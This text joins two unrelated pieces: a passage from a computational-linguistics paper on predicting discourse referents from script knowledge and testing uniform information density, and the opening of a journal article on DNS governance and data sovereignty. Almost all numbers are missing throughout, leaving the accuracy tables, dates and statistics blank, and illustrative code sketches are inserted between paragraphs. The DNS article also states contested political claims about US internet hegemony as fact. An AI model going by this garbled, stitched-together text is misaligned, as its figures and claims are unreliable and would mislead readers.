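    return float(x_d @ x_vr / denom) if denom else 0.0

def participant_type_fit(predicates_for_type_role, verb, emb):
    """Dot product between the average embedding of training predicates that take
    participant type p in role r and the embedding of the current predicate."""
    x_pr = avg_vec(predicates_for_type_role, emb)
    return float(x_pr @ emb[verb]) if verb in emb else 0.0
```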
let us use "soap" as an example of a previously introduced dr and see how the feature is computed. in order to choose which inference rules can be applied to yield "soap", we can inspect figure . there are only two preceding predicates which have dr "soap" as their object (rubbed and grabbed), resulting in two potential rules x-object-of-grabbed → x-object-of-rinsed and x-object-of-rubbed → x-object-of-rinsed. we define the score ϕ(d,h(t)) as the average of the rule scores. more formally, we can write

$$\phi(d, h^{(t)}) = \frac{1}{|N(d, h^{(t)})|} \sum_{(u,v,r) \in N(d, h^{(t)})} \psi(u, v, r), \qquad ( )$$

where ψ(u,v,r) is the score for a rule x-r-of-u → x-r-of-v, n(d,h(t)) is the set of applicable rules, and |n(d,h(t))| denotes its cardinality. we define ϕ(d,h(t)) as 0 when the set of applicable rules is empty (i.e. |n(d,h(t))| = 0). (in all our experiments, rather than considering all potential predicates in the history to instantiate rules, we take into account only preceding verbs. in other words, u and v can be interleaved by at most one verb and |n(d, h(t))| is in { , , }.)

the scoring function ψ(u,v,r) is defined as a linear function of a joint embedding xu,v of verbs u and v: $\psi(u,v,r) = \alpha_r^{\top} x_{u,v}$. the two remaining questions are ( ) how to define the joint embeddings xu,v, and ( ) how to estimate the parameter vector αr. the joint embedding of two predicates, xu,v, can, in principle, be any composition function of embeddings of u and v, for example their sum or component-wise product. inspired by bordes et al. ( ), we use the difference between the word embeddings:

$$\psi(u, v, r) = \alpha_r^{\top} (x_u - x_v),$$

where xu and xv are external embeddings of the corresponding verbs. encoding the succession relation as translation in the embedding space has one desirable property: the scoring function will be largely agnostic to the morphological form of the predicates. for example, the difference between the embeddings of rinsed and rubbed is very similar to that of rinse and rub (botha and blunsom, ), so the corresponding rules will receive similar scores. now, we can rewrite the equation ( ) as

$$\phi(d, h^{(t)}) = \alpha_{r(h^{(t)})}^{\top} \, \frac{\sum_{(u,v,r) \in N(d, h^{(t)})} (x_u - x_v)}{|N(d, h^{(t)})|}, \qquad ( )$$

where r(h(t)) denotes the syntactic function corresponding to the dr being predicted (object in our example). as for the parameter vector αr, there are again a number of potential ways how it can be estimated. for example, one can train a discriminative classifier to estimate the parameters. however, we opted for a simpler approach: we set it equal to the empirical estimate of the expected feature vector xu,v on the training set (this essentially corresponds to using the naive bayes model with the simplistic assumption that the score differences are normally distributed with spherical covariance matrices):

$$\alpha_r = \frac{1}{D_r} \sum_{l,t} \delta_r\big(r(h^{(l,t)})\big) \sum_{(u,v,r') \in N(d^{(l,t)}, h^{(l,t)})} (x_u - x_v), \qquad ( )$$

where l refers to a document in the training set, t is (as before) a position in the document, h(l,t) and
d(l,t) are the history and the correct dr for this position, respectively. the term δr(r′) is the kronecker delta, which equals 1 if r = r′ and 0 otherwise. dr is the total number of rules for the syntactic function r in the training set:

$$D_r = \sum_{l,t} \delta_r\big(r(h^{(l,t)})\big) \times |N(d^{(l,t)}, h^{(l,t)})|.$$

let us illustrate the computation with an example. imagine that our training set consists of the document in figure , and the trained model is used to predict the upcoming dr in our referent cloze example (figure ). the training document includes the pair x-object-of-scrubbed → x-object-of-rinsing, so the corresponding term (xscrubbed - xrinsing) participates in the summation ( ) for αobj. as we rely on external embeddings, which encode semantic similarities between lexical items, the dot product of this term and (xrubbed - xrinsed) will be high (the score would have been even higher, should the predicate be in the morphological form rinsing rather than rinsed; however, embeddings of rinsing and rinsed would still be sufficiently close to each other for our argument to hold). consequently, ϕ(d,h(t)) is expected to be positive for d = "soap", thus predicting "soap" as the likely forthcoming dr.

unfortunately, there are other terms (xu − xv) both in expression ( ) for αobj and in expression ( ) for ϕ(d,h(t)). these terms may be irrelevant to the current prediction, as x-object-of-plugged → x-object-of-filling from figure , and may not even encode any valid regularities, as x-object-of-got → x-object-of-scrubbed (again from figure ). this may suggest that our feature will be too contaminated with noise to be informative for making predictions. however, recall that independent random vectors in high dimensions are almost orthogonal, and, assuming they are bounded, their dot products are close to zero. consequently, the products of the relevant ("non-random") terms, in our example (xscrubbed - xrinsing) and (xrubbed - xrinsed), are likely to overcome the ("random") noise. as we will see in the ablation studies, the predicate-schema feature is indeed predictive of a dr and contributes to the performance of the full model.

. experiments

we would like to test whether our model can produce accurate predictions and whether the model's guesses correlate well with human predictions for the referent cloze task. in order to be able to evaluate the effect of script knowledge on referent predictability, we compare three models: our full script model uses all of the features introduced in section . ; the linguistic model relies only on the 'linguistic features' but not the script-specific ones; and the base model includes all the shallow linguistic features. the base model differs from the linguistic model in that it does not model selectional preferences. table summarizes features used in different models. the data set was randomly divided into training ( %), development ( %, stories from scenarios), and test ( %, stories from scenarios) sets.
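before turning to the results, here is a compact sketch of the predicate-schema score defined above, under the simplifying assumptions already stated there: alpha_r is the empirical mean of the rule difference vectors seen in training, and phi averages the dot products of alpha_r with the difference vectors of the rules applicable at prediction time. names and data layout are illustrative, not the authors' implementation.

```python
import numpy as np

def estimate_alpha(training_rules, emb):
    """training_rules: dict mapping a syntactic role to (u, v) verb pairs observed
    for that role in training. Returns role -> empirical mean of (x_u - x_v)."""
    alpha = {}
    for role, pairs in training_rules.items():
        diffs = [emb[u] - emb[v] for u, v in pairs if u in emb and v in emb]
        alpha[role] = np.mean(diffs, axis=0) if diffs else None
    return alpha

def predicate_schema_score(applicable_rules, role, alpha, emb):
    """applicable_rules: (u, v) pairs linking a preceding predicate u of the
    candidate DR to the current predicate v, all with the same syntactic role.
    Returns phi = average over rules of alpha_r . (x_u - x_v); 0 if none apply."""
    if not applicable_rules or alpha.get(role) is None:
        return 0.0
    scores = [float(alpha[role] @ (emb[u] - emb[v])) for u, v in applicable_rules]
    return sum(scores) / len(scores)
```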
the feature weights were learned using l-bfgs (byrd et al., ) to optimize the log-likelihood.

evaluation against original referents. we calculated the percentage of correct dr predictions. see table for the averages across scenarios. we can see that the task appears hard for humans: their average performance reaches only % accuracy. as expected, the base model is the weakest system (the accuracy of %). modeling selectional preferences yields an extra % in accuracy (linguistic model). the key finding is that incorporation of script knowledge increases the accuracy by further %, although still far behind human performance ( % vs. %). besides accuracy, we use perplexity, which we computed not only for all our models but also for human predictions. this was possible as each task was solved by multiple humans. we used unsmoothed normalized guess frequencies as the probabilities. as we can see from table , the perplexity scores are consistent with the accuracies: the script model again outperforms other methods, and, as expected, all the models are weaker than humans.

table : accuracies (in %) and perplexities for different models and scenarios. columns: accuracy and perplexity for the human, script, linguistic, and tily models; rows: grocery shopping, repairing a flat bicycle tyre, riding a public bus, getting a haircut, planting a tree, borrowing book from library, taking bath, going on a train, baking a cake, flying in an airplane, average. the script model substantially outperforms linguistic and base models (with p < . , significance tested with mcnemar's test (everitt, )). as expected, the human prediction model outperforms the script model (with p < . , significance tested by mcnemar's test).

as we used two sets of script features, capturing different aspects of script knowledge, we performed extra ablation studies (table ). the experiments confirm that both feature sets were beneficial.

table : accuracies from ablation experiments (accuracy, perplexity):
  linguistic model: . , .
  linguistic model + predicate schemas: . , .
  linguistic model + participant type fit: . , .
  full script model (both features): . , .

evaluation against human expectations. in the previous subsection, we demonstrated that the incorporation of selectional preferences and, perhaps more interestingly, the integration of automatically acquired script knowledge lead to improved accuracy in predicting discourse referents. now we turn to another question raised in the introduction: does incorporation of this knowledge make our predictions more human-like? in other words, are we able to accurately estimate human expectations? this includes not only being sufficiently accurate but also making the same kind of incorrect predictions.

in this evaluation, we therefore use human guesses collected during the referent cloze task as our target. we then calculate the relative accuracy of each computational model. as can be seen in figure , the script model, at approx. % accuracy, is a lot more accurate in predicting human guesses than the linguistic model and the base model.

figure : average relative accuracies of different models (script, linguistic, base) w.r.t human predictions.

figure : average jensen-shannon divergence between human predictions and models (script, linguistic, base).

we can also observe that the margin between the script model and the linguistic model is a lot larger in this evaluation than between the base model and the linguistic model. this indicates that the model which has access to script knowledge is much more similar to human prediction behavior in terms of top guesses than the script-agnostic models.

now we would like to assess if our predictions are similar as distributions rather than only yielding similar top predictions. in order to compare the distributions, we use the jensen-shannon divergence (jsd), a symmetrized version of the kullback-leibler divergence. intuitively, jsd measures the distance between two probability distributions. a smaller jsd value is indicative of more similar distributions. figure shows that the probability distributions resulting from the script model are more similar to human predictions than those of the linguistic and base models.
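the jensen-shannon divergence used for this comparison can be computed directly from its definition; a small self-contained numpy sketch (illustrative; the guess counts are invented):

```python
import numpy as np

def kl(p, q):
    """KL(p || q) in bits, skipping zero-probability entries of p."""
    mask = p > 0
    return float(np.sum(p[mask] * np.log2(p[mask] / q[mask])))

def jsd(p, q):
    """Jensen-Shannon divergence: symmetrized KL against the mixture m."""
    p = np.asarray(p, dtype=float); p /= p.sum()
    q = np.asarray(q, dtype=float); q /= q.sum()
    m = 0.5 * (p + q)
    return 0.5 * kl(p, m) + 0.5 * kl(q, m)

# example: human guess counts vs. a model distribution over the same categories
human = np.array([14, 5, 1, 0])
model = np.array([0.6, 0.25, 0.1, 0.05])
print(round(jsd(human, model), 3))
```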
in these experiments, we have shown that script knowledge improves predictions of upcoming ref- erents and that the script model is the best among our models in approximating human referent predic- tions. referring expression type prediction model (re model) using the referent prediction models, we next at- tempt to replicate tily and piantadosi’s findings that the choice of the type of referring expression (pro- noun or full np) depends in part on the predictability of the referent. . uniform information density hypothesis the uniform information density (uid) hypothe- sis suggests that speakers tend to convey information at a uniform rate (jaeger, ). applied to choice of referring expression type, it would predict that a highly predictable referent should be encoded us- ing a short code (here: a pronoun), while an unpre- dictable referent should be encoded using a longer form (here: a full np). information density is mea- sured using the information-theoretic measure of the surprisal s of a message mi: s(mi) = − log p(mi | context) uid has been very successful in explaining a vari- ety of linguistic phenomena; see jaeger et al. ( ). there is, however, controversy about whether uid affects pronominalization. tily and piantadosi ( ) report evidence that writers are more likely to refer using a pronoun or proper name when the ref- erent is easy to guess and use a full np when readers have less certainty about the upcoming referent; see also arnold ( ). but other experiments (using highly controlled stimuli) have failed to find an ef- fect of predictability on pronominalization (steven- son et al., ; fukumura and van gompel, ; rohde and kehler, ). the present study hence contributes to the debate on whether uid affects re- ferring expression choice. . a model of referring expression choice our goal is to determine whether referent pre- dictability (quantified in terms of surprisal) is cor- related with the type of referring expression used in the text. here we focus on the distinction be- tween pronouns and full noun phrases. our data also contains a small percentage (ca. %) of proper names (like “john”). due to this small class size and earlier findings that proper nouns behave much like pronouns (tily and piantadosi, ), we com- bined pronouns and proper names into a single class of short encodings. for the referring expression type prediction task, we estimate the surprisal of the referent from each of our computational models from section as well as the human cloze task. the surprisal of an upcoming discourse referent d(t) based on the previous context h(t) is thereby estimated as: s(d(t)) = − log p(d(t) | h(t)) in order to determine whether referent predictability has an effect on referring expression type over and above other factors that are known to affect the choice of referring expression, we train a logistic regression model with referring expression type as a response variable and discourse referent predictabil- ity as well as a large set of other linguistic factors (based on tily and piantadosi, ) as explanatory variables. the model is defined as follows: p(n(t) = n|d(t),h(t)) = exp(v t g(n,dt,h(t)))∑ n′ exp(v t g(n′,dt,h(t))) , where d(t) and h(t) are defined as before, g is the feature function, and v is the vector of model pa- rameters. the summation in the denominator is over np types (full np vs. pronoun/proper noun). . re model experiments we ran four different logistic regression models. 
these models all contained exactly the same set of linguistic predictors but differed in the estimates used for referent type surprisal and residual entropy. one logistic regression model used surprisal esti- mates based on the human referent cloze task, while the three other models used estimates based on the three computational models (base, linguistic and script). for our experiment, we are interested in the choice of referring expression type for those occur- rences of references, where a “real choice” is possi- ble. we therefore exclude for our analysis reported below all first mentions as well as all first and second person pronouns (because there is no optionality in how to refer to first or second person). this subset contains data points. . results the results of all four logistic regression models are shown in table . we first take a look at the results for the linguistic features. while there is a bit of variability in terms of the exact coefficient es- timates between the models (this is simply due to small correlations between these predictors and the predictors for surprisal), the effect of all of these features is largely consistent across models. for in- stance, the positive coefficients for the recency fea- ture means that when a previous mention happened estimate std. error pr(>| z |) human script linguistic base human script linguistic base human script linguistic base (intercept) - . - . - . - . . . . . < e- *** < e- *** < e- *** . *** recency . . . . . . . . < e- *** < e- *** < e- *** < e- *** frequency . . . . . . . . . . . . pastobj . . . . . . . . . . . . pastsubj - . - . - . - . . . . . . . . . . . pastexppronoun . . . . . . . . . e- *** . e- *** . e- *** . e- *** deptypesubj . . . . . . . . < e- *** < e- *** . e- *** . * deptypeobj . . . . . . . . . e- *** . e- *** . * . surprisal - . - . . - . . . . . . . . . residualentropy - . . - . - . . . . . . . . . table : coefficients obtained from regression analysis for different models. two np types considered: full np and pronoun/propernoun, with base class full np. significance: ‘***’ < . , ‘**’ < . , ‘*’ < . , and ‘.’ < . . very recently, the referring expression is more likely to be a pronoun (and not a full np). the coefficients for the surprisal estimates of the different models are, however, not significantly dif- ferent from zero. model comparison shows that they do not improve model fit. we also used the esti- mated models to predict referring expression type on new data and again found that surprisal estimates from the models did not improve prediction accu- racy. this effect even holds for our human cloze data. hence, it cannot be interpreted as a problem with the models—even human predictability esti- mates are, for this dataset, not predictive of referring expression type. we also calculated regression models for the full dataset including first and second person pronouns as well as first mentions ( data points). the re- sults for the full dataset are fully consistent with the findings shown in table : there was no significant effect of surprisal on referring expression type. this result contrasts with the findings by tily and piantadosi ( ), who reported a significant effect of surprisal on re type for their data. in order to replicate their settings as closely as possible, we also included residualentropy as a predictor in our model (see last predictor in table ); however, this did not change the results. 
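the surprisal predictor and the referring-expression-type regression described in this section can be set up in a few lines; the sketch below uses scikit-learn and a toy feature subset (surprisal, recency, frequency) rather than the full predictor set of table , so it is a schematic illustration, not a reproduction of the study:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

def surprisal(prob):
    """s(d) = -log p(d | h): probability of the referent that was actually used,
    taken either from a computational model or from the human cloze distribution."""
    return -np.log(prob)

# toy data: one row per non-first-mention referring expression
# columns: [surprisal, recency (sentences since last mention), frequency]
X = np.array([[surprisal(0.70), 1.0, 3],
              [surprisal(0.05), 4.0, 1],
              [surprisal(0.30), 2.0, 2],
              [surprisal(0.90), 1.0, 5]])
y = np.array([1, 0, 1, 1])   # 1 = pronoun / proper name, 0 = full np

clf = LogisticRegression().fit(X, y)
print(clf.coef_)  # under uid, the surprisal coefficient would be negative:
                  # more predictable referents favour the shorter form
```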
discussion and future work our study on incrementally predicting discourse referents showed that script knowledge is a highly important factor in determining human discourse ex- pectations. crucially, the computational modelling approach allowed us to tease apart the different fac- tors that affect human prediction as we cannot ma- nipulate this in humans directly (by asking them to “switch off” their common-sense knowledge). by modelling common-sense knowledge in terms of event sequences and event participants, our model captures many more long-range dependencies than normal language models. the script knowledge is automatically induced by our model from crowd- sourced scenario-specific text collections. in a second study, we set out to test the hypoth- esis that uniform information density affects refer- ring expression type. this question is highly con- troversial in the literature: while tily and piantadosi ( ) find a significant effect of surprisal on refer- ring expression type in a corpus study very similar to ours, other studies that use a more tightly con- trolled experimental approach have not found an ef- fect of predictability on re type (stevenson et al., ; fukumura and van gompel, ; rohde and kehler, ). the present study, while replicating exactly the setting of t&p in terms of features and analysis, did not find support for a uid effect on re type. the difference in results between t&p and our results could be due to the different corpora and text sorts that were used; specifically, we would expect that larger predictability effects might be ob- servable at script boundaries, rather than within a script, as is the case in our stories. a next step in moving our participant predic- tion model towards nlp applications would be to replicate our modelling results on automatic text- to-script mapping instead of gold-standard data as done here (in order to approximate human level of processing). furthermore, we aim to move to more complex text types that include reference to several scripts. we plan to consider the recently published roc stories corpus (mostafazadeh et al., ), a large crowdsourced collection of topically unre- stricted short and simple narratives, as a basis for these next steps in our research. acknowledgments we thank the editors and the anonymous review- ers for their insightful suggestions. we would like to thank florian pusse for helping with the ama- zon mechanical turk experiment. we would also like to thank simon ostermann and tatjana anikina for helping with the inscript corpus. this research was partially supported by the german research foundation (dfg) as part of sfb ‘informa- tion density and linguistic encoding’, european research council (erc) as part of erc starting grant broadsem (# ), the dutch national sci- ence foundation as part of nwo vidi . . , and the dfg once again as part of the mmci cluster of excellence (exc ). references simon ahrendt and vera demberg. . improving event prediction by representing script participants. in proceedings of naacl-hlt. jennifer e. arnold. . the effect of thematic roles on pronoun use and frequency of reference continuation. discourse processes, ( ): – . marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . marco baroni, georgiana dinu, and germán kruszewski. . don’t count, predict! a systematic compari- son of context-counting vs. context-predicting seman- tic vectors. in proceedings of acl. 
antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . trans- lating embeddings for modeling multi-relational data. in proceedings of nips. jan a. botha and phil blunsom. . compositional morphology for word representations and language modelling. in proceedings of icml. richard h. byrd, peihuang lu, jorge nocedal, and ciyou zhu. . a limited memory algorithm for bound constrained optimization. siam journal on scientific computing, ( ): – . nathanael chambers and daniel jurafsky. . unsu- pervised learning of narrative event chains. in pro- ceedings of acl. nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in proceedings of acl. brian s. everitt. . the analysis of contingency ta- bles. crc press. lea frermann, ivan titov, and manfred pinkal. . a hierarchical bayesian model for unsupervised induc- tion of script knowledge. in proceedings of eacl. kumiko fukumura and roger p. g. van gompel. . choosing anaphoric expressions: do people take into account likelihood of reference? journal of memory and language, ( ): – . t. florian jaeger, esteban buz, eva m. fernandez, and helen s. cairns. . signal reduction and linguis- tic encoding. handbook of psycholinguistics. wiley- blackwell. t. florian jaeger. . redundancy and reduction: speakers manage syntactic information density. cog- nitive psychology, ( ): – . bram jans, steven bethard, ivan vulić, and marie francine moens. . skip n-grams and ranking functions for predicting script events. in proceedings of eacl. gina r. kuperberg and t. florian jaeger. . what do we mean by prediction in language comprehension? language, cognition and neuroscience, ( ): – . gina r. kuperberg. . separate streams or proba- bilistic inference? what the n can tell us about the comprehension of events. language, cognition and neuroscience, ( ): – . marta kutas, katherine a. delong, and nathaniel j. smith. . a look around at what lies ahead: pre- diction and predictability in language processing. pre- dictions in the brain: using our past to generate a fu- ture. tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in proceedings of interspeech. tomas mikolov, stefan kombrink, anoop deoras, lukar burget, and jan cernocky. . rnnlm-recurrent neural network language modeling toolkit. in pro- ceedings of the asru workshop. tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. . distributed representations of words and phrases and their compositionality. in proceedings of nips. ashutosh modi and ivan titov. . inducing neural models of script knowledge. proceedings of conll. ashutosh modi, tatjana anikina, simon ostermann, and manfred pinkal. . inscript: narrative texts anno- tated with script information. proceedings of lrec. ashutosh modi. . event embeddings for semantic script modeling. proceedings of conll. nasrin mostafazadeh, nathanael chambers, xiaodong he, devi parikh, dhruv batra, lucy vanderwende, pushmeet kohli, and james allen. . a corpus and cloze evaluation for deeper understanding of com- monsense stories. proceedings of naacl. haoruo peng, daniel khashabi, and dan roth. . solving hard coreference problems. in proceedings of naacl. karl pichotta and raymond j mooney. . statistical script learning with multi-argument events. proceed- ings of eacl. altaf rahman and vincent ng. . resolving com- plex cases of definite pronouns: the winograd schema challenge. 
in proceedings of emnlp. michaela regneri, alexander koller, and manfred pinkal. . learning script knowledge with web experiments. in proceedings of acl. hannah rohde and andrew kehler. . grammati- cal and information-structural influences on pronoun production. language, cognition and neuroscience, ( ): – . rachel rudinger, vera demberg, ashutosh modi, ben- jamin van durme, and manfred pinkal. . learn- ing to predict script events from domain-specific text. proceedings of the international conference on lexi- cal and computational semantics (*sem ). asad sayeed, clayton greenberg, and vera demberg. . thematic fit evaluation: an aspect of selectional preferences. in proceedings of the workshop on eval- uating vector space representations for nlp (repe- val ). roger c. schank and robert p. abelson. . scripts, plans, goals, and understanding. lawrence erlbaum associates, potomac, maryland. simone schütz-bosbach and wolfgang prinz. . prospective coding in event representation. cognitive processing, ( ): – . rosemary j. stevenson, rosalind a. crawley, and david kleinman. . thematic roles, focus and the rep- resentation of events. language and cognitive pro- cesses, ( ): – . harry tily and steven piantadosi. . refer effi- ciently: use less informative expressions for more pre- dictable meanings. in proceedings of the workshop on the production of referring expressions: bridging the gap between computational and empirical approaches to reference. alessandra zarcone, marten van schijndel, jorrig vo- gels, and vera demberg. . salience and atten- tion in surprisal-based accounts of language process- ing. frontiers in psychology, : . doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , global internet come into a new dns era mou chengjin research center of international strategic, china mobile communication federation software evaluation center of national information center e-mail: mcjzp @ .com abstract—dns, short for domain name system, is an analytic central system, which transfers domain names into ip addresses that can be identified by the internet. dns has internal traits within it to conduct commands and regulations in network communication, as well as centralized ones that are inherently political. unlike other internet protocols, dns protocols penetrate the application layer, the internet layer, the transport layer, and provide even more complicated, tailored low-level software that are feasible to the dns, ranging from authorized domain name servers to recursive domain name servers, a domain system based content distribution network (dn-cdn), whether private or public, inside or outside the network, it must be dependent on the service provided by domain name system (dns). dns includes the increase in client subnet in dns extension mechanism (edns) to conduct more accurate matches to push service. keyword-dns; edns; sdn; ipv ; tld i. important landmark events a. dns “execution day” knowledge of obsolescent, wrong, or inappropriate methods to conduct software work around is required when we need to go on dns software updating or programming. some workarounds pertain to dns software have made it a deeper and refined situation for the us to control and inaugurate domain name system, unavoidably there are functional declination and an increase in unpredictable errors and safety risks. consequently, reinforcement in domain name system becomes inevitable. 
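the compliance question behind the "flag day" discussed below comes down to whether a name server answers edns queries cleanly instead of dropping them or relying on old workarounds. a rough probe can be written with the dnspython library; this is a sketch under the assumption that dnspython is available, and the server address and zone below are placeholders:

```python
import dns.message
import dns.query
import dns.rcode

def probe_edns(server_ip, zone):
    """Send the same SOA question twice: once without EDNS, once as a plain
    EDNS(0) query. A compliant authoritative server answers both (or returns a
    proper error code); a timeout or FORMERR on the EDNS(0) query points to the
    legacy behaviour that updated resolvers no longer work around."""
    plain = dns.message.make_query(zone, "SOA")   # no OPT record
    edns0 = dns.message.make_query(zone, "SOA")
    edns0.use_edns(0)                             # attach an EDNS(0) OPT record
    for label, query in (("plain", plain), ("edns0", edns0)):
        try:
            resp = dns.query.udp(query, server_ip, timeout=3)
            print(label, dns.rcode.to_text(resp.rcode()))
        except Exception as exc:
            print(label, "no usable answer:", exc)

# probe_edns("192.0.2.53", "example.com")   # placeholder address and zone
```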
the internet engineering task force (ietf) proposed the dns extension mechanism (edns) in . in march , the us department of commerce's national telecommunications and information administration (ntia), the internet corporation for assigned names and numbers (icann) and verisign, a us company that provides intelligent information infrastructure services, acting as the domain name root zone managers, completed the domain name root zone key (ksk) replacement plan. on october , icann finished the first global root zone ksk rollover in the history of the internet and announced that rollovers would take place every year. professionals described the ksk rollover as a unified "re-keying", with the subsequent "dns execution day" being a unified "lock and hinge updating"; the two interlock with each other, laying codes systematically. in may , the internet's worldwide regional regulatory agencies (rir) officially announced that february would be the "dns flag day". according to the official notifications from the regional internet authorities and the joint alert of the internet community, non-compliant domain name servers would be identified as "dead" from the "execution day" onward, which would cut into the accessibility of the websites that rely on them. the servers concerned are mainly authoritative and recursive domain name servers. compliance means that the "workarounds" are dispensed with or removed from dns software by updating the software version, and that the dns extension mechanism (edns) is recognised and supported, including under software-defined interconnection (sdn). edns is defined by the standard rfc released by the ietf in . the dns protocols have been in use on the internet for more than years, and the "execution day" marked the first time in the history of the internet that dns protocols were maintained and dns software versions updated together globally, signalling that dns has entered a new beginning, a new phase, and a new generation of control. the asia pacific network information centre (apnic) stated: "we hope that all operators of authoritative dnssec (dns security extensions) servers will be able to successfully update their dns system software and seamlessly transfer to the next years of the dns era." the london school of economics and political science (lse) published an article entitled "china and the domain name system" in march stating: "in terms of information and communication technology (ict), dns is an 'inherently political' technology. because of its ability to allocate, store, and resolve internet addresses, it is undoubtedly an important fountain of political power; dns mainly assures the latent capacity for successful communication between standardized technologies and systems and the avoidance of duplicate allocation of the same network address. 'inherently political' technologies are also characterized by the high concentration of the dns technology itself. therefore, those who possess the centralized technology of dns will seize power and dominance in cyberspace."
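the flag-day compliance requirement described above is, in practice, a protocol-level test: a compliant authoritative server must answer both a plain dns query and an edns0 query instead of silently dropping the latter. the sketch below illustrates that check. it is a minimal illustration under stated assumptions, not the tooling used by the registries: it assumes the python dnspython package is installed, and the server address and zone shown are placeholders to be replaced with a nameserver and zone you are allowed to probe.

```python
import dns.exception
import dns.message
import dns.query
import dns.rcode
import dns.rdatatype


def edns_probe(server_ip: str, zone: str, timeout: float = 3.0) -> dict:
    """Ask a nameserver the same question twice: once as plain DNS, once with an
    EDNS0 OPT record. A flag-day-compliant server answers both; a server that only
    times out on the EDNS0 query still depends on the old workarounds."""
    results = {}
    for label, use_edns in (("plain-dns", None), ("edns0", 0)):
        query = dns.message.make_query(zone, dns.rdatatype.SOA, use_edns=use_edns)
        try:
            reply = dns.query.udp(query, server_ip, timeout=timeout)
            results[label] = {
                "rcode": dns.rcode.to_text(reply.rcode()),
                "edns_in_reply": reply.edns >= 0,  # -1 means the reply carried no OPT record
            }
        except dns.exception.Timeout:
            results[label] = {"rcode": "TIMEOUT", "edns_in_reply": False}
    return results


# placeholder address and zone; point these at infrastructure you operate
print(edns_probe("192.0.2.53", "example.com"))
```

a server whose "edns0" result is a timeout while "plain-dns" succeeds is exactly the kind of non-compliant server the flag day targeted.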
) to abandon ipv as “next generation internet protocols”, this lasts for nearly years on july , , the us internet engineering task force (ietf) released document rfc , announcing the latest official standard for the sixth edition of the internet protocol (ipv ) (code: std ).the document rfc (the draft ipv specification) proposed in december and the “next generation internet protocol ipng” which was originally for the transition to ipv abandoned and removed. the us internet regional working group pointed out: “in the past few years, the widespread implementation of new data protection regulations around the world is beginning to make inroads on technology companies and consumers worldwide, resulting the change to bad practices of some formerly established best methods required by ietf procedures and regulations.”that is to say, the dramatic changes in the global network application environment have caused dramatic changes in the network technology frames and user needs, “which led to the inevitability and necessity of abolishing drafts (protocols) and transitional measures (plans) with ipv in the “next generation of internet ”, showing that the document rfc no. is based not only on the objective summary and generalization of the history and status of the internet but the adherence to the principle of “us first” and the maintenance of “the supremacy of us interests”, the aim of cyberspace strategy and the security bottom line. in the united states, the transition to ipv proposed with a pretext of the "insufficient number of ipv addresses"; the “ipv draft specification” and “next generation internet ipng” transition plan now abandoned based on the same principles. the reason being not simply in the design of network technology architecture; nor in the strategic error of network international journal of advanced network, monitoring and controls volume , no. , deployment, but a major deployment to deepen and refine the us network hegemony, and a fundamental decision to reaffirm the “inherently political” trait of the internet. correspondingly, the ksk and dns domain name system extension mechanism (edns), which controls the dns domain name system security extension (dnssec), are the premise and the foundation for establishing and consolidating the core role and status of dns in the "next generation internet ". ) the release of three basic principles advocated by ietf intellectual property rights in may , the us internet engineering task force (ietf) issued the official document rfc (bcp ), the “intellectual property rights in ietf technology”, providing three basic principles in handling internet intellectual property problems and discarding document rfc and rfc . therfc document stipulates: a) the ietf will make no determination about the validity of any particular ipr claim. b) the ietf, following normal processes, can decide to use technology for which ipr disclosures been made if it decides that such a use is warranted. c) in order for a working group and the rest of the ietf have the information needed to make an informed decision about the use of particular technology. all those contributing to the working group’s discussions must disclose the existence of any ipr the contributor or any other ietf participant believes covers or may ultimately cover the technology under discussion. this applies to both contributors and other participants, and applies whether they contribute in person, via email, or by other means. 
the requirement applies to all ipr of the participant, the participant’s employer, sponsor, or others represented by the participant that reasonably and personally known to the participant. no patent search is required. that is to say, “the internet is mine, and the rules are made by me.” ietf is legitimate to choose technology that has not intellectual property rights claimed yet, or freely licensed intellectual property technology; ietf can adopt any technology with no promise of any technology license. indicating that technology adopted by the ietf in internet engineering applications is free from the restriction of intellectual property rights and ownership owners. it only determined by the ietf whether the technology adopted by the internet is “compliant”; technology and any application of intellectual property rights are invalid and non-compliant without the consent of the ietf, and the ietf will not admit it. it is commonplace for the ietf to enforce the utterance of security technology in its technical specifications. the release of the three principles of intellectual property rights is only a public announcement of the “removing the burning brands from under the boiling cauldron”, “overweening” and “getting my own way” strategies. until november , the us patent and trademark office (uspto) granted , patents for ipv related technologies, and the european patent office (epo) granted , . the abrogation of ietf for ipv as the "next generation internet protocol" and its decision to implement a global “dns execution day” and the practice of arbitrarily shutting down the best servers of other countries (such as iraq and libya, disconnecting the network and services. no matter how powerful the intellectual property rights are, no matter who grants intellectual property rights to them and who's intellectual property rights are, the three principles of intellectual property rights of ietf, the us civil society organization, are placed on the authority of the government to protect intellectual property rights and the authority of the regulatory agencies. they are absolute dominate and the only "compliance" to the internet. the principle of “us priority” and “us interest first” and the bottom line always placed beyond international journal of advanced network, monitoring and controls volume , no. , everything else, too is the cyberspace hegemony to maintain the internet “one network for all” policy. ii. legal competition for data sovereignty the three basic dimensions that make up cyberspace are the infrastructure-centered physical dimension, the data-centric information dimension, and the cognitive dimension centered on human behavior. for more than half a century, irreversible evolution have taken place, from industrialization to socialization, from commercialization to customization, and the quality-quantity evolution from technology-driven to data-driven, especially the dominance and influence of marginal politic power have become increasingly prominent. 
the united nations internet governance (igf) organization has approved the global internet and jurisdiction policy network (i&j) as an “open forum” with more than key entities from different stakeholders around the world participated, including governments and networks enterprises, technical groups, civil organizations, academic institutions and international institutions (for some reason, no chinese organization participated), with the focus of research and discussion being “the jurisdiction of data” for three consecutive i & j annual meetings (including the upcoming annual meeting in june ) . in october , the european court of justice (ecj) made a landmark ruling that overturned the “safe harbor “mechanism proposed by the european commission at the beginning of this century and has utilized by more than , companies, including ibm, google and ericsson. according to the european court of justice, the "safe harbor" mechanism does not provide adequate protection for the personal data of eu citizens, because the united states often violates the privacy protection measures established by the mechanism in the name of national security, public interest and law enforcement needs. uk is the one with the highest penetration rate of the internet economy in the g countries. the goal of the uk government is to make uk the safest country to conduct online business activities, and the government holds that the level and duration of protection for personal data should be improve simultaneously when the amount of personal data is keeping increased by the development of digital economy. on august , , the uk department of digital, cultural media and sports issued a report titled “new data protection act: our reforms”, which passed the new data protection law to update and 